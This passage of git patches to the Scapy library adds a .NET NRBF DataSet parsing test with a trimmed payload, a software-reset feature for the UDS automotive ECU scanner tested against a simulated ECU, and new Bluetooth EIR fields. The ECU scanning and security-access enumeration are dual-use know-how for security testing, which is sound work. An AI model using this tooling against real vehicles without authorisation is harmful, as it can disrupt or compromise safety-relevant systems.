00000000000..0add8591ac3 --- /dev/null +++ b/test/scapy/layers/msnrtp.uts @@ -0,0 +1,155 @@ +% MS-NRTP tests + ++ [MS-NRTP] + += [MS-NRBF] parse .NET Binary Format + +from scapy.layers.ms_nrtp import * + +data = b'\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x0c\x02\x00\x00\x00NSystem.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x05\x01\x00\x00\x00\x13System.Data.DataSet\n\x00\x00\x00\x16DataSet.RemotingFormat\x13DataSet.DataSetName\x11DataSet.Namespace\x0eDataSet.Prefix\x15DataSet.CaseSensitive\x12DataSet.LocaleLCID\x1aDataSet.EnforceConstraints\x1aDataSet.ExtendedProperties\x14DataSet.Tables.Count\x10DataSet.Tables_0\x04\x01\x01\x01\x00\x00\x00\x02\x00\x07\x1fSystem.Data.SerializationFormat\x02\x00\x00\x00\x01\x08\x01\x08\x02\x02\x00\x00\x00\x05\xfd\xff\xff\xff\x1fSystem.Data.SerializationFormat\x01\x00\x00\x00\x07value__\x00\x08\x02\x00\x00\x00\x01\x00\x00\x00\x06\x04\x00\x00\x00\x00\t\x04\x00\x00\x00\t\x04\x00\x00\x00\x00\t\x04\x00\x00\x00\n\x01\x00\x00\x00\t\x05\x00\x00\x00\x0f\x05\x00\x00\x00\x07\x00\x00\x00\x02TRIMMED\x0b' + +pkt = NRBF(data) +assert len(pkt.records) == 5 + +assert isinstance(pkt.records[0], NRBFSerializationHeader) +assert pkt.records[0].RootID == 1 +assert pkt.records[0].HeaderId == -1 + +assert pkt.records[1].LibraryId == 2 +assert pkt.records[1].LibraryName.String == b'System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' + +assert pkt.records[2].ObjectId == 1 +assert pkt.records[2].MemberCount == 10 +assert len(pkt.records[2].MemberNames) == 10 +assert pkt.records[2].MemberNames[9].String == b"DataSet.Tables_0" +assert pkt.records[2].AdditionalInfos[0].Value.TypeName.String == b"System.Data.SerializationFormat" +assert pkt.records[2].AdditionalInfos[1].Value == PrimitiveTypeEnum.Boolean +assert pkt.records[2].AdditionalInfos[5].Value == PrimitiveTypeEnum.Byte +assert pkt.records[2].Members[0].Members[0].Value == 1 +assert isinstance(pkt.records[2].Members[1], NRBFBinaryObjectString) +assert isinstance(pkt.records[2].Members[2], NRBFMemberReference) +assert isinstance(pkt.records[2].Members[3], NRBFMemberReference) +assert isinstance(pkt.records[2].Members[4], NRBFMemberPrimitiveUnTyped) +assert isinstance(pkt.records[2].Members[7], NRBFObjectNull) +assert isinstance(pkt.records[2].Members[9], NRBFMemberReference) +assert pkt.records[2].Members[9].IdRef == 5 + +assert pkt.records[3].ObjectId == 5 +assert pkt.records[3].Values == b"TRIMMED" + +assert isinstance(pkt.records[4], NRBFMessageEnd) + += [MS-NRBF] build .NET Binary Format + +pkt = NRBF( + records=[ + NRBFSerializationHeader(HeaderId=-1), + NRBFBinaryLibrary( + LibraryId=2, + LibraryName=NRBFLengthPrefixedString( + String=b"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + ), + ), + NRBFClassWithMembersAndTypes( + ObjectId=1, + Name=NRBFLengthPrefixedString(String=b"System.Data.DataSet"), + MemberCount=10, + MemberNames=[ + NRBFLengthPrefixedString(String=b"DataSet.RemotingFormat"), + NRBFLengthPrefixedString(String=b"DataSet.DataSetName"), + NRBFLengthPrefixedString(String=b"DataSet.Namespace"), + NRBFLengthPrefixedString(String=b"DataSet.Prefix"), + NRBFLengthPrefixedString(String=b"DataSet.CaseSensitive"), + NRBFLengthPrefixedString(String=b"DataSet.LocaleLCID"), + NRBFLengthPrefixedString(String=b"DataSet.EnforceConstraints"), + NRBFLengthPrefixedString(String=b"DataSet.ExtendedProperties"), + NRBFLengthPrefixedString(String=b"DataSet.Tables.Count"), + NRBFLengthPrefixedString(String=b"DataSet.Tables_0"), + ], + BinaryTypeEnums=[ + BinaryTypeEnum.Class, + BinaryTypeEnum.String, + BinaryTypeEnum.String, + BinaryTypeEnum.String, + BinaryTypeEnum.Primitive, + BinaryTypeEnum.Primitive, + BinaryTypeEnum.Primitive, + BinaryTypeEnum.Object, + BinaryTypeEnum.Primitive, + BinaryTypeEnum.PrimitiveArray, + ], + AdditionalInfos=[ + NRBFAdditionalInfo( + type=BinaryTypeEnum.SystemClass, + Value=NRBFClassTypeInfo( + TypeName=NRBFLengthPrefixedString( + String=b"System.Data.SerializationFormat" + ), + LibraryId=2, + ) + ), + NRBFAdditionalInfo( + type=BinaryTypeEnum.Primitive, + Value=PrimitiveTypeEnum.Boolean, + ), + NRBFAdditionalInfo( + type=BinaryTypeEnum.Primitive, + Value=PrimitiveTypeEnum.Int32, + ), + NRBFAdditionalInfo( + type=BinaryTypeEnum.Primitive, + Value=PrimitiveTypeEnum.Boolean, + ), + NRBFAdditionalInfo( + type=BinaryTypeEnum.Primitive, + Value=PrimitiveTypeEnum.Int32, + ), + NRBFAdditionalInfo( + type=BinaryTypeEnum.PrimitiveArray, + Value=PrimitiveTypeEnum.Byte, + ), + ], + LibraryId=2, + Members=[ + NRBFClassWithMembersAndTypes( + ObjectId=-3, + Name=NRBFLengthPrefixedString( + String=b"System.Data.SerializationFormat" + ), + MemberNames=[ + NRBFLengthPrefixedString(String=b"value__"), + ], + BinaryTypeEnums=[BinaryTypeEnum.Primitive], + AdditionalInfos=[ + NRBFAdditionalInfo(type=BinaryTypeEnum.Primitive, + Value=PrimitiveTypeEnum.Int32), + ], + LibraryId=2, + Members=[ + NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Int32, Value=1) + ], + ), + NRBFBinaryObjectString( + ObjectId=4, + Value=NRBFLengthPrefixedString(String=b""), + ), + NRBFMemberReference(IdRef=4), + NRBFMemberReference(IdRef=4), + NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Boolean, Value=0), + NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Int32, Value=1033), + NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Boolean, Value=0), + NRBFObjectNull(), + NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Int32, Value=1), + NRBFMemberReference(IdRef=5), + ], + ), + NRBFArraySinglePrimitive( + ObjectId=5, + PrimitiveTypeEnum=PrimitiveTypeEnum.Byte, + Values=b"TRIMMED", + ), + NRBFMessageEnd(), + ] +) + +assert bytes(pkt) == data From d10b482b7c84fa323a300568fb894ce6127a2dce Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 11 Dec 2024 00:48:26 +0100 Subject: [PATCH 1398/1632] Add ValueError to except in L2Socket.close() (#4607) --- scapy/arch/linux/__init__.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/arch/linux/__init__.py b/scapy/arch/linux/__init__.py index ec1f2f480e2..f4e380487ba 100644 --- a/scapy/arch/linux/__init__.py +++ b/scapy/arch/linux/__init__.py @@ -276,7 +276,7 @@ def close(self): try: if self.promisc and getattr(self, "ins", None): set_promisc(self.ins, self.iface, 0) - except (AttributeError, OSError): + except (AttributeError, OSError, ValueError): pass SuperSocket.close(self) From 4fbf6fb07db7153f8a8c6ec8efcd3287b54265e9 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 11 Dec 2024 01:07:20 +0100 Subject: [PATCH 1399/1632] Add software reset function for UDS scanner (#4605) --- scapy/contrib/automotive/scanner/executor.py | 10 +- scapy/contrib/automotive/uds_scan.py | 88 ++++---- .../automotive/scanner/uds_scanner.uts | 191 +++++++++++++++++- 3 files changed, 245 insertions(+), 44 deletions(-) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 6d58bc72d26..1965d27cfad 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -66,8 +66,8 @@ def __init__( socket, # type: Optional[_SocketUnion] reset_handler=None, # type: Optional[Callable[[], None]] reconnect_handler=None, # type: Optional[Callable[[], _SocketUnion]] # noqa: E501 - test_cases=None, - # type: Optional[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]]] # noqa: E501 + test_cases=None, # type: Optional[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]]] # noqa: E501 + software_reset_handler=None, # type: Optional[Callable[[_SocketUnion], None]] # noqa: E501 **kwargs # type: Optional[Dict[str, Any]] ): # type: (...) -> None @@ -82,6 +82,7 @@ def __init__( self.target_state = self._initial_ecu_state self.reset_handler = reset_handler self.reconnect_handler = reconnect_handler + self.software_reset_handler = software_reset_handler self.cleanup_functions = list() # type: List[_CleanupCallable] @@ -152,6 +153,11 @@ def reset_target(self): log_automotive.info("Target reset") if self.reset_handler: self.reset_handler() + elif self.software_reset_handler: + if self.socket and self.socket.closed: + self.reconnect() + if self.socket: + self.software_reset_handler(self.socket) self.target_state = self._initial_ecu_state def reconnect(self): diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index a23c7c6027d..ee2cb004aa6 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -2,43 +2,15 @@ # This file is part of Scapy # See https://scapy.net/ for more information # Copyright (C) Nils Weiss - -# scapy.contrib.description = UDS AutomotiveTestCaseExecutor -# scapy.contrib.status = loads - -from abc import ABC -import struct -import random -import time -import itertools import copy import inspect - +import itertools +import logging +import random +import struct +import time +from abc import ABC from collections import defaultdict - -from scapy.compat import orb -from scapy.contrib.automotive import log_automotive -from scapy.packet import Raw, Packet -from scapy.error import Scapy_Exception -from scapy.contrib.automotive.uds import UDS, UDS_NR, UDS_DSC, UDS_TP, \ - UDS_RDBI, UDS_WDBI, UDS_SA, UDS_RC, UDS_IOCBI, UDS_RMBA, UDS_ER, \ - UDS_TesterPresentSender, UDS_CC, UDS_RDBPI, UDS_RD, UDS_TD - -from scapy.contrib.automotive.ecu import EcuState -from scapy.contrib.automotive.scanner.enumerator import ServiceEnumerator, \ - _AutomotiveTestCaseScanResult, _AutomotiveTestCaseFilteredScanResult, \ - StateGeneratingServiceEnumerator -from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ - _SocketUnion, _TransitionTuple, StateGenerator -from scapy.contrib.automotive.scanner.configuration import \ - AutomotiveTestCaseExecutorConfiguration # noqa: E501 -from scapy.contrib.automotive.scanner.graph import _Edge -from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase # noqa: E501 -from scapy.contrib.automotive.scanner.executor import AutomotiveTestCaseExecutor # noqa: E501 - -# TODO: Refactor this import -from scapy.contrib.automotive.uds_ecu_states import * # noqa: F401, F403 - # typing imports from typing import ( Dict, @@ -54,6 +26,29 @@ Sequence, ) +from scapy.compat import orb +from scapy.contrib.automotive import log_automotive +from scapy.contrib.automotive.ecu import EcuState +from scapy.contrib.automotive.scanner.configuration import \ + AutomotiveTestCaseExecutorConfiguration # noqa: E501 +from scapy.contrib.automotive.scanner.enumerator import ServiceEnumerator, \ + _AutomotiveTestCaseScanResult, _AutomotiveTestCaseFilteredScanResult, \ + StateGeneratingServiceEnumerator +from scapy.contrib.automotive.scanner.executor import AutomotiveTestCaseExecutor # noqa: E501 +from scapy.contrib.automotive.scanner.graph import _Edge +from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase # noqa: E501 +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ + _SocketUnion, _TransitionTuple, StateGenerator +from scapy.contrib.automotive.uds import UDS, UDS_NR, UDS_DSC, UDS_TP, \ + UDS_RDBI, UDS_WDBI, UDS_SA, UDS_RC, UDS_IOCBI, UDS_RMBA, UDS_ER, \ + UDS_TesterPresentSender, UDS_CC, UDS_RDBPI, UDS_RD, UDS_TD +# TODO: Refactor this import +from scapy.contrib.automotive.uds_ecu_states import * # noqa: F401, F403 +from scapy.error import Scapy_Exception +from scapy.packet import Raw, Packet + +# scapy.contrib.description = UDS AutomotiveTestCaseExecutor +# scapy.contrib.status = loads # Definition outside the class UDS_RMBASequentialEnumerator # to allow pickling @@ -872,8 +867,8 @@ def _get_table_entry_y(self, tup): resp = tup[2] if resp is not None: return "0x%04x: %s" % \ - (tup[1].dataIdentifier, - repr(resp.payload)) + (tup[1].dataIdentifier, + repr(resp.payload)) else: return "0x%04x: No response" % tup[1].dataIdentifier @@ -1252,3 +1247,24 @@ def default_test_case_clss(self): return [UDS_ServiceEnumerator, UDS_DSCEnumerator, UDS_TPEnumerator, UDS_SAEnumerator, UDS_WDBISelectiveEnumerator, UDS_RMBAEnumerator, UDS_RCEnumerator, UDS_IOCBIEnumerator] + + +def uds_software_reset(connection, # type: _SocketUnion + logger=log_automotive # type: logging.Logger + ): # type: (...) -> None + logger.debug("Reset procedure of target started.") + resp = connection.sr1(UDS() / UDS_ER(resetType=1), + timeout=5, + verbose=False) + if resp and resp.service != 0x7f: + logger.debug("Reset procedure of target complete") + return + + logger.debug("Couldn't reset target with UDS_ER. " + "At least try to set target back to DefaultSession") + resp = connection.sr1(UDS() / UDS_DSC(b"\x01"), verbose=False, timeout=5) + if resp and resp.service != 0x7f: + logger.debug("Target in DefaultSession") + return + + logger.error("Target not in DefaultSession. Software reset failed.") diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 32ab7bc369b..49649b52d4c 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -30,7 +30,7 @@ conf.debug_dissector = False = Define Testfunction -def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstable_socket=True, **kwargs): +def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstable_socket=True, software_reset=False, **kwargs): tester_obj_pipe = ObjectPipe(name="TesterPipe") ecu_obj_pipe = ObjectPipe(name="ECUPipe") TesterSocket = UnstableSocket if unstable_socket else TestSocket @@ -58,11 +58,26 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl sim = threading.Thread(target=answering_machine_thread) try: sim.start() - scanner = UDS_Scanner( - tester, reset_handler=reset, reconnect_handler=reconnect, - test_cases=enumerators, timeout=0.1, - retry_if_none_received=True, unittest=True, - **kwargs) + if software_reset: + scanner = UDS_Scanner( + tester, + software_reset_handler=uds_software_reset, + reconnect_handler=reconnect, + test_cases=enumerators, + timeout=0.1, + retry_if_none_received=True, + unittest=True, + **kwargs) + else: + scanner = UDS_Scanner( + tester, + reset_handler=reset, + reconnect_handler=reconnect, + test_cases=enumerators, + timeout=0.1, + retry_if_none_received=True, + unittest=True, + **kwargs) for i in range(12): print("Starting scan") scanner.scan(timeout=10) @@ -258,6 +273,170 @@ assert "serviceNotSupported received 75 times" in result assert "serviceNotSupportedInActiveSession received 19 times" in result assert "securityAccessDenied received 2 times" in result += Simulate ECU and run Scanner with software resert + +responses = ([EcuResponse(None, [UDS()/UDS_DSCPR(b"\x01")])] + + mEcu.supported_responses) + +scanner = executeScannerInVirtualEnvironment( + responses, + [UDS_SA_XOR_Enumerator, UDS_DSCEnumerator, UDS_ServiceEnumerator], + software_reset=True, + UDS_DSCEnumerator_kwargs={"scan_range": range(5), "delay_state_change": 0, + "overwrite_timeout": False}, + UDS_SA_XOR_Enumerator_kwargs={"scan_range": range(5)}, + UDS_ServiceEnumerator_kwargs={"scan_range": [0x10, 0x11, 0x14, 0x19, 0x22, + 0x23, 0x24, 0x27, 0x28, 0x29, + 0x2A, 0x2C, 0x2E, 0x2F, 0x31, + 0x34, 0x35, 0x36, 0x37, 0x38, + 0x3D, 0x3E, 0x83, 0x84, 0x85, + 0x87], + "request_length": 1}) + +scanner.show_testcases() +scanner.show_testcases_status() +assert len(scanner.state_paths) == 6 +assert scanner.scan_completed +assert scanner.progress() > 0.95 + +assert EcuState(session=1) in scanner.final_states +assert EcuState(session=2, tp=1) in scanner.final_states +assert EcuState(session=1, tp=1) in scanner.final_states +assert EcuState(session=3, tp=1) in scanner.final_states +assert EcuState(session=2, tp=1, security_level=2) in scanner.final_states +assert EcuState(session=3, tp=1, security_level=2) in scanner.final_states + +#################### UDS_SA_XOR_Enumerator ################ +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 24 +assert len(tc.results_with_positive_response) >= 6 +assert len(tc.scanned_states) == 6 + +result = tc.show(dump=True) + +assert "serviceNotSupportedInActiveSession received 5 times" in result +assert "incorrectMessageLengthOrInvalidFormat received 14 times" in result + +################# UDS_DSCEnumerator ##################### +tc = scanner.configuration.test_cases[1] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 17 +assert len(tc.results_with_positive_response) == 13 +assert len(tc.scanned_states) == 6 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat received 14 times" in result + +###################### UDS_ServiceEnumerator ################### +tc = scanner.configuration.test_cases[2] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 156 +assert len(tc.results_with_positive_response) == 0 +assert len(tc.scanned_states) == 6 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat received 34 times" in result +assert "serviceNotSupported received 75 times" in result +assert "serviceNotSupportedInActiveSession received 19 times" in result +assert "securityAccessDenied received 2 times" in result + += Simulate ECU and run Scanner with software resert 2 + +responses = ([EcuResponse(None, [UDS()/UDS_ERPR(b"\x01")])] + + mEcu.supported_responses) + +scanner = executeScannerInVirtualEnvironment( + responses, + [UDS_SA_XOR_Enumerator, UDS_DSCEnumerator, UDS_ServiceEnumerator], + software_reset=True, + UDS_DSCEnumerator_kwargs={"scan_range": range(5), "delay_state_change": 0, + "overwrite_timeout": False}, + UDS_SA_XOR_Enumerator_kwargs={"scan_range": range(5)}, + UDS_ServiceEnumerator_kwargs={"scan_range": [0x10, 0x11, 0x14, 0x19, 0x22, + 0x23, 0x24, 0x27, 0x28, 0x29, + 0x2A, 0x2C, 0x2E, 0x2F, 0x31, + 0x34, 0x35, 0x36, 0x37, 0x38, + 0x3D, 0x3E, 0x83, 0x84, 0x85, + 0x87], + "request_length": 1}) + +scanner.show_testcases() +scanner.show_testcases_status() +assert len(scanner.state_paths) == 5 +assert scanner.scan_completed +assert scanner.progress() > 0.95 + +assert EcuState(session=1) in scanner.final_states +assert EcuState(session=2, tp=1) in scanner.final_states +assert EcuState(session=3, tp=1) in scanner.final_states +assert EcuState(session=2, tp=1, security_level=2) in scanner.final_states +assert EcuState(session=3, tp=1, security_level=2) in scanner.final_states + +#################### UDS_SA_XOR_Enumerator ################ +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 19 +assert len(tc.results_with_positive_response) >= 6 +assert len(tc.scanned_states) == 5 + +result = tc.show(dump=True) + +assert "serviceNotSupportedInActiveSession received 5 times" in result +assert "incorrectMessageLengthOrInvalidFormat received 14 times" in result + +################# UDS_DSCEnumerator ##################### +tc = scanner.configuration.test_cases[1] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 20 +assert len(tc.results_with_positive_response) == 5 +assert len(tc.scanned_states) == 5 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat received 20 times" in result + +###################### UDS_ServiceEnumerator ################### +tc = scanner.configuration.test_cases[2] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 130 +assert len(tc.results_with_positive_response) == 0 +assert len(tc.scanned_states) == 5 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat received 34 times" in result +assert "serviceNotSupported received 75 times" in result +assert "serviceNotSupportedInActiveSession received 19 times" in result +assert "securityAccessDenied received 2 times" in result + + = UDS_ServiceEnumerator def req_handler(resp, req): From 535fc33e10dea2dd24aff71995c8112c83e6e7a4 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Wed, 11 Dec 2024 01:08:06 +0100 Subject: [PATCH 1400/1632] bluetooth: Add EIR public target address (#4603) --- scapy/layers/bluetooth.py | 8 ++++++++ test/scapy/layers/bluetooth.uts | 5 +++++ 2 files changed, 13 insertions(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index c86906aa370..9d7fe252feb 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1232,6 +1232,13 @@ def extract_padding(self, s): return s[:plen], s[plen:] +class EIR_PublicTargetAddress(EIR_Element): + name = "Public Target Address" + fields_desc = [ + LEMACField('bd_addr', None) + ] + + class EIR_ServiceData32BitUUID(EIR_Element): name = 'EIR Service Data - 32-bit UUID' fields_desc = [ @@ -2342,6 +2349,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(EIR_Hdr, EIR_SecurityManagerOOBFlags, type=0x11) bind_layers(EIR_Hdr, EIR_PeripheralConnectionIntervalRange, type=0x12) bind_layers(EIR_Hdr, EIR_ServiceData16BitUUID, type=0x16) +bind_layers(EIR_Hdr, EIR_PublicTargetAddress, type=0x17) bind_layers(EIR_Hdr, EIR_ServiceData32BitUUID, type=0x20) bind_layers(EIR_Hdr, EIR_ServiceData128BitUUID, type=0x21) bind_layers(EIR_Hdr, EIR_Manufacturer_Specific_Data, type=0xff) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 6696efe6846..a50b078fcbd 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -471,6 +471,11 @@ assert p[EIR_ClassOfDevice].major_service_classes == 0 assert p[EIR_ClassOfDevice].major_device_class == 5 assert p[EIR_ClassOfDevice].minor_device_class == 1 += Parse EIR_PublicTargetAddress +p = HCI_Hdr(hex_bytes('043e1402010001554433221100080717ffeeddccbbaaaa')) +assert EIR_PublicTargetAddress in p +assert p[EIR_PublicTargetAddress].bd_addr == 'aa:bb:cc:dd:ee:ff' + = Parse EIR_ServiceData32BitUUID p = HCI_Hdr(hex_bytes('042fff01c47c80894df801000c0128a269a30c4a125d13f30196894df80c012820f61a1a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')) From a8583a5132165a191d7d53ab5fdf1b6a91ea6dd9 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Wed, 11 Dec 2024 01:10:37 +0100 Subject: [PATCH 1401/1632] bluetooth: Add EIR service solicitation types (#4602) --- scapy/layers/bluetooth.py | 26 ++++++++++++++++++++++++++ test/scapy/layers/bluetooth.uts | 7 +++++++ 2 files changed, 33 insertions(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 9d7fe252feb..9e131f69d84 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1219,6 +1219,30 @@ class EIR_Device_ID(EIR_Element): ] +class EIR_ServiceSolicitation16BitUUID(EIR_Element): + name = "EIR Service Solicitation - 16-bit UUID" + fields_desc = [ + XLEShortField("svc_uuid", None) + ] + + def extract_padding(self, s): + # Needed to end each EIR_Element packet and make PacketListField work. + plen = EIR_Element.length_from(self) - 2 + return s[:plen], s[plen:] + + +class EIR_ServiceSolicitation128BitUUID(EIR_Element): + name = "EIR Service Solicitation - 128-bit UUID" + fields_desc = [ + UUIDField('svc_uuid', None, uuid_fmt=UUIDField.FORMAT_REV) + ] + + def extract_padding(self, s): + # Needed to end each EIR_Element packet and make PacketListField work. + plen = EIR_Element.length_from(self) - 2 + return s[:plen], s[plen:] + + class EIR_ServiceData16BitUUID(EIR_Element): name = "EIR Service Data - 16-bit UUID" fields_desc = [ @@ -2348,6 +2372,8 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(EIR_Hdr, EIR_SecureSimplePairingRandomizerR192, type=0x0f) bind_layers(EIR_Hdr, EIR_SecurityManagerOOBFlags, type=0x11) bind_layers(EIR_Hdr, EIR_PeripheralConnectionIntervalRange, type=0x12) +bind_layers(EIR_Hdr, EIR_ServiceSolicitation16BitUUID, type=0x14) +bind_layers(EIR_Hdr, EIR_ServiceSolicitation128BitUUID, type=0x15) bind_layers(EIR_Hdr, EIR_ServiceData16BitUUID, type=0x16) bind_layers(EIR_Hdr, EIR_PublicTargetAddress, type=0x17) bind_layers(EIR_Hdr, EIR_ServiceData32BitUUID, type=0x20) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index a50b078fcbd..73daa4eabce 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -552,6 +552,13 @@ except TypeError: else: assert False, "expected exception" += Parse EIR_ServiceSolicitation16BitUUID and EIR_ServiceSolicitation128BitUUID + +d = hex_bytes("043e29020100013d1ef10747d81d0319000002010603140d181115d0002d121e4b0fa4994eceb531f40579aa") +p = HCI_Hdr(d) +assert p[EIR_ServiceSolicitation16BitUUID].svc_uuid == 0x180d +assert p[EIR_ServiceSolicitation128BitUUID].svc_uuid == UUID('7905f431-b5ce-4e99-a40f-4b1e122d00d0') + = Parse EIR_ServiceData16BitUUID d = hex_bytes("043e1902010001abcdef7da97f0d020102030350fe051650fee6c2ac") From f793b27b08f5aa24ecaf819480af32f9216bc20d Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sun, 22 Dec 2024 22:42:04 +0100 Subject: [PATCH 1402/1632] bluetooth: Add EIR Advertising Interval (#4612) --- scapy/layers/bluetooth.py | 8 ++++++++ test/scapy/layers/bluetooth.uts | 5 +++++ 2 files changed, 13 insertions(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 9e131f69d84..c5902610c4c 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1263,6 +1263,13 @@ class EIR_PublicTargetAddress(EIR_Element): ] +class EIR_AdvertisingInterval(EIR_Element): + name = "Advertising Interval" + fields_desc = [ + LEShortField("advertising_interval", 0) + ] + + class EIR_ServiceData32BitUUID(EIR_Element): name = 'EIR Service Data - 32-bit UUID' fields_desc = [ @@ -2376,6 +2383,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(EIR_Hdr, EIR_ServiceSolicitation128BitUUID, type=0x15) bind_layers(EIR_Hdr, EIR_ServiceData16BitUUID, type=0x16) bind_layers(EIR_Hdr, EIR_PublicTargetAddress, type=0x17) +bind_layers(EIR_Hdr, EIR_AdvertisingInterval, type=0x1a) bind_layers(EIR_Hdr, EIR_ServiceData32BitUUID, type=0x20) bind_layers(EIR_Hdr, EIR_ServiceData128BitUUID, type=0x21) bind_layers(EIR_Hdr, EIR_Manufacturer_Specific_Data, type=0xff) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 73daa4eabce..763dcf032cb 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -476,6 +476,11 @@ p = HCI_Hdr(hex_bytes('043e1402010001554433221100080717ffeeddccbbaaaa')) assert EIR_PublicTargetAddress in p assert p[EIR_PublicTargetAddress].bd_addr == 'aa:bb:cc:dd:ee:ff' += Parse EIR_AdvertisingInterval +p = HCI_Event_Hdr(hex_bytes('3e23020100002e4961121110170201060f0954656c6553617420283432453229031a9001a3')) +assert EIR_AdvertisingInterval in p +assert p[EIR_AdvertisingInterval].advertising_interval == 400 + = Parse EIR_ServiceData32BitUUID p = HCI_Hdr(hex_bytes('042fff01c47c80894df801000c0128a269a30c4a125d13f30196894df80c012820f61a1a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')) From eb279ccf9fd2153dc8110633ef9c15565fe674f4 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sun, 22 Dec 2024 23:09:46 +0100 Subject: [PATCH 1403/1632] bluetooth: Add EIR appearance (#4610) --- scapy/layers/bluetooth.py | 66 +++++++++++++++++++++++++++++++++ test/scapy/layers/bluetooth.uts | 7 ++++ 2 files changed, 73 insertions(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index c5902610c4c..887ad7017bf 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1270,6 +1270,71 @@ class EIR_AdvertisingInterval(EIR_Element): ] +class EIR_Appearance(EIR_Element): + name = "EIR_Appearance2" + fields_desc = [ + BitEnumField('category', 0, 10, tot_size=-2, enum={ + 0x000: 'Unknown', + 0x001: 'Phone', + 0x002: 'Computer', + 0x003: 'Watch', + 0x004: 'Clock', + 0x005: 'Display', + 0x006: 'Remote Control', + 0x007: 'Eyeglasses', + 0x008: 'Tag', + 0x009: 'Keyring', + 0x00A: 'Media Player', + 0x00B: 'Barcode Scanner', + 0x00C: 'Thermometer', + 0x00D: 'Heart Rate Sensor', + 0x00E: 'Blood Pressure', + 0x00F: 'Human Interface Device', + 0x010: 'Glucose Meter', + 0x011: 'Running Walking Sensor', + 0x012: 'Cycling', + 0x013: 'Control Device', + 0x014: 'Network Device', + 0x015: 'Sensor', + 0x016: 